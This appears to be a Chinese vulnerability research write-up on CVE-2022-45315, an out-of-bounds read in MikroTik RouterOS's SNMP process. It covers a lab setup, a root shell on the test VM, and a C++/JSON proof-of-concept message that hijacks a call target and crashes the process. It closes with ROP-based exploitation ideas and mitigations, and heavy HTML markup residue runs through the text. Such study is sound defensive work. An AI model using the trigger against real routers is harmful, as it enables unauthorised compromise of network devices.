MikroTik RouterOS SNMP 越界读漏洞研究 (CVE-2022-45315)<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2022-45315
影响版本<\/strong>: MikroTik RouterOS 稳定版 v7.6 之前的所有版本
漏洞类型<\/strong>: 越界读漏洞
影响组件<\/strong>: `\/nova\/bin\/snmp<\/code> 进程潜在危害<\/strong>: 认证后远程代码执行 (RCE) CVSS评分<\/strong>: 待补充 (需参考NVD官方数据)<\/p>`

前置知识<\/h2> RouterOS 通信机制<\/h3> RouterOS 提供多种交互方式：<\/p> JS交互<\/strong>: 通过HTTP协议(80端口)，由www<\/code>进程处理请求并转发<\/li> Winbox交互<\/strong>: 通过8291端口，由mproxy<\/code>进程处理请求并转发<\/li> <\/ol> Nova Message 格式<\/h3> RouterOS使用自定义的Nova Message格式进行进程间通信，格式为Type Key-Value Pairs。<\/p> 类型(Type)示例<\/strong>:<\/p> b<\/code>: bool<\/li> u<\/code>: 32bit integer<\/li> q<\/code>: 64bit integer<\/li> s<\/code>: string<\/li> r<\/code>: raw<\/li> a<\/code>: IPv6<\/li> m<\/code>: message<\/li> B<\/code>: bool array<\/li> U<\/code>: 32bit integer array<\/li> Q<\/code>: 64bit integer array<\/li> S<\/code>: string array<\/li> R<\/code>: raw array<\/li> A<\/code>: IPv6 array<\/li> M<\/code>: message array<\/li> <\/ul> Key结构<\/strong>:<\/p> 格式: 0xGGVVVV<\/code> GG<\/code>: 命令组<\/li> VVVV<\/code>: 值<\/li> <\/ul> <\/li> 常见命令组: 0xFF<\/code>: SYS<\/li> 0xFE<\/code>: STD<\/li> 0xFD<\/code>: LOCAL<\/li> 0x01<\/code>: NET<\/li> 0x02<\/code>: MODULER<\/li> ...(其他组略)<\/li> <\/ul> <\/li> <\/ul> 进程管理<\/h3> RouterOS启动流程:<\/p> init<\/code>启动loader<\/code><\/li> loader<\/code>启动并管理其他进程<\/li> 子进程信息存储在\/nova\/etc\/loader\/system.x3<\/code>中<\/li> <\/ol> 环境搭建<\/h2> 实验环境<\/h3> MikroTik RouterOS 7.1.1<\/li> 推荐使用VMware Workstation模拟注意<\/strong>: 开启Hyper-V可能导致VMware运行问题<\/li> <\/ul> <\/li> <\/ul> 常用指令<\/h3> # 查看网卡<\/span> <\/span><\/span>interface print <\/span><\/span> <\/span><\/span># 配置动态IP<\/span> <\/span><\/span>ip dhcp-client add interface=<\/span>ether1 disable=<\/span>no <\/span><\/span> <\/span><\/span># 查看网络信息<\/span> <\/span><\/span>ip dhcp-client print detail <\/span><\/span> <\/span><\/span># 查看授权<\/span> <\/span><\/span>system licens print <\/span><\/span> <\/span><\/span># 关机\/重启<\/span> <\/span><\/span>system shutdown <\/span><\/span>system reboot <\/span><\/span> <\/span><\/span># 重置系统<\/span> <\/span><\/span>system reset <\/span><\/span><\/code><\/pre>启用SNMP服务<\/h3> # 开启SNMP<\/span> <\/span><\/span>snmp set enabled=<\/span>yes <\/span><\/span> <\/span><\/span># 查看SNMP团体信息<\/span> <\/span><\/span>snmp community\/print <\/span><\/span> <\/span><\/span># 添加新团体<\/span> <\/span><\/span>snmp community add name=<\/span>VegetaRocks <\/span><\/span> <\/span><\/span># 设置联系信息<\/span> <\/span><\/span>snmp set contact=<\/span>"Contact info"<\/span> <\/span><\/span>snmp set location=<\/span>"Location"<\/span> <\/span><\/span> <\/span><\/span># 查看SNMP配置<\/span> <\/span><\/span>snmp print <\/span><\/span><\/code><\/pre>获取Root Shell<\/h2> 使用execute_milo<\/code>方法获取root权限:<\/p> 下载工具:<\/p> git clone https:\/\/github.com\/tenable\/routeros.git <\/span><\/span>sudo apt install libboost-all-dev cmake libboost-dev <\/span><\/span><\/code><\/pre><\/li> 上传必要文件到RouterOS:<\/p> python mftp.py -u <uname> -p <pwd> --ip <ip> -o put \ <\/span><\/span><\/span><\/span> -f vm_bins\/busybox vm_bins\/milo vm_bins\/gdb <\/span><\/span><\/code><\/pre><\/li> 使用LiveCD修改权限:<\/p> sudo su <\/span><\/span>cd rw\/disk\/ <\/span><\/span>chmod +x busybox <\/span><\/span>chmod +x gdb <\/span><\/span>chmod 755<\/span> milo <\/span><\/span>mv milo ..\/..\/bin\/milo <\/span><\/span>ln -s \/rw\/disk\/busybox ash <\/span><\/span>exit <\/span><\/span><\/code><\/pre><\/li> 编译并执行execute_milo<\/code>:<\/p> .\/execute_milo -i <ip> -p <port> -u <username> --password <password> <\/span><\/span><\/code><\/pre><\/li> 通过telnet连接:<\/p> telnet <target ip> 1270<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞触发与分析<\/h2> 漏洞触发PoC<\/h3> char<\/span> payload[513<\/span>]; <\/span><\/span>memset(payload, 'a'<\/span>, sizeof<\/span>(char<\/span>) *<\/span> 512<\/span>); <\/span><\/span> <\/span><\/span>WinboxMessage msg; <\/span><\/span>msg.set_to(34<\/span>, 0x1<\/span>); \/\/ 目标为snmp进程 <\/span><\/span><\/span><\/span>msg.set_command(0xfe0005<\/span>); \/\/ 添加对象命令 <\/span><\/span><\/span><\/span>msg.add_u32(0x14<\/span>, 0xfffffffe<\/span>); \/\/ 可控的u32值 <\/span><\/span><\/span><\/span>msg.add_string(0x5<\/span>, payload); \/\/ 长字符串 <\/span><\/span><\/span><\/span>msg.set_request_id(1<\/span>); \/\/ 请求ID <\/span><\/span><\/span><\/code><\/pre>对应JSON结构:<\/p> { <\/span><\/span> "u14"<\/span>: 0<\/span>xfffffffe<\/span>, <\/span><\/span> "uff0006"<\/span>: 1<\/span>, <\/span><\/span> "uff0007"<\/span>: 0<\/span>xfe<\/span>0005<\/span>, <\/span><\/span> "s5"<\/span>: "'a'*512"<\/span>, <\/span><\/span> "Uff0001"<\/span>: [34<\/span>,1<\/span>] <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞分析<\/h3> 漏洞触发链:<\/p> Item::setConfig<\/strong>:<\/p> *<\/span>((_DWORD *<\/span>)this<\/span> +<\/span> 6<\/span>) =<\/span> nv::<\/span>message::<\/span>get<<\/span>nv::<\/span>u32_id><\/span>(message, 20<\/span>); <\/span><\/span><\/code><\/pre> 通过u14:0xfffffffe<\/code>控制*((_DWORD *)this + 6)<\/code>的值<\/li> <\/ul> <\/li> Item::regenerateKeys<\/strong>:<\/p> v1 =<\/span> 28<\/span> *<\/span> *<\/span>((_DWORD *<\/span>)this<\/span> +<\/span> 6<\/span>); \/\/ 可控的计算 <\/span><\/span><\/span><\/span>v11 =<\/span> (char<\/span> *<\/span>)&<\/span>unk_80859C0 +<\/span> v1; \/\/ 可控的指针运算 <\/span><\/span><\/span><\/span>tree_base::<\/span>insert_unique(&<\/span>v13, v11, v7, &<\/span>v18, map_node_move_constr<<\/span>string,vector<<\/span>unsigned<\/span> char<\/span>>><\/span>); <\/span><\/span><\/code><\/pre><\/li> tree_base::insert_unique<\/strong>:<\/p> if<\/span> ((unsigned<\/span> __int8<\/span>)sub_7BA4((int<\/span>)a2, a2[3<\/span>] +<\/span> a2[5<\/span>], a4)) <\/span><\/span><\/code><\/pre><\/li> sub_7BA4<\/strong>:<\/p> call dword ptr [eax+<\/span>10<\/span>h] \/\/ 崩溃点，执行可控地址 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ol> 漏洞利用思路<\/h2> 虽然可以控制执行流，但存在以下限制:<\/p> 只能控制call [eax+10h]<\/code>的地址<\/li> 其他参数不可控<\/li> <\/ol> 可能的利用方式<\/strong>:<\/p> 寻找合适的ROP链<\/li> 通过栈迁移技术将控制流转移到可控的输入区域<\/li> 利用RouterOS中丰富的RPC通信函数构造完整攻击链<\/li> <\/ol> 修复建议<\/h2> 升级到RouterOS v7.6或更高版本<\/li> 在无法升级的情况下，禁用SNMP服务 snmp set enabled=<\/span>no <\/span><\/span><\/code><\/pre><\/li> <\/ol> 参考资料<\/h2> CVE-2022-45315 Detail (nvd.nist.gov)<\/a><\/li> cq674350529\/pocs_slides (github.com)<\/a><\/li> tenable\/routeros (github.com)<\/a><\/li> Pulling MikroTik into the Limelight (margin.re)<\/a><\/li> MarginResearch\/resources (github.com)<\/a><\/li> <\/ol>